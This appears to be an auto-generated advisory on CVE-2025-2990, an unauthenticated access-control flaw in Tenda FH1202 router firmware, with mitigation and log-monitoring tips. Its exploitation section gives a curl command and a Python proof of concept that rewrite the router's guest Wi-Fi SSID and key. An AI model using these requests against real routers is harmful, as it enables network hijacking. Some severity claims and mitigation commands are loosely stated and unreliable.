Tenda FH1202, Improper Access Control, CVE-2025-2990 (Critical)

Listen to this Post

How CVE-2025-2990 Works

The vulnerability exists in Tenda FH1202 firmware version 1.2.0.14(408) within the `/goform/AdvSetWrlGstset` endpoint of the web management interface. Attackers can remotely exploit improper access controls to manipulate router settings without authentication. The flaw allows unauthorized access to administrative functions, potentially enabling network hijacking, MITM attacks, or device compromise. The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N) reflects its network-based attack vector and low attack complexity. Public exploit availability increases its critical severity.

DailyCVE Form

Platform: Tenda FH1202
Version: 1.2.0.14(408)
Vulnerability: Improper access control
Severity: Critical
Date: 04/07/2025

What Undercode Say:

Exploitation

1. Curl Exploit:

curl -X POST http://<TARGET_IP>/goform/AdvSetWrlGstset -d "ssid=HACKED&key=12345678"

2. Python PoC:

import requests
target = "http://192.168.1.1/goform/AdvSetWrlGstset"
payload = {"enable": "1", "ssid": "EVIL_NET", "key": "P@ssw0rd"}
requests.post(target, data=payload)

Mitigation

1. Patch: Upgrade to firmware >1.2.0.14(408).

2. Firewall Rule:

iptables -A INPUT -p tcp --dport 80 -s ! <TRUSTED_IP> -j DROP

3. Log Monitoring:

grep "POST /goform/AdvSetWrlGstset" /var/log/nginx/access.log

Analytics

  • Attack Surface: Remote, unauthenticated HTTP requests.
  • Impact: Full router configuration takeover.
  • Detection: Unauthorized SSID/password changes.

References

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-2990
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top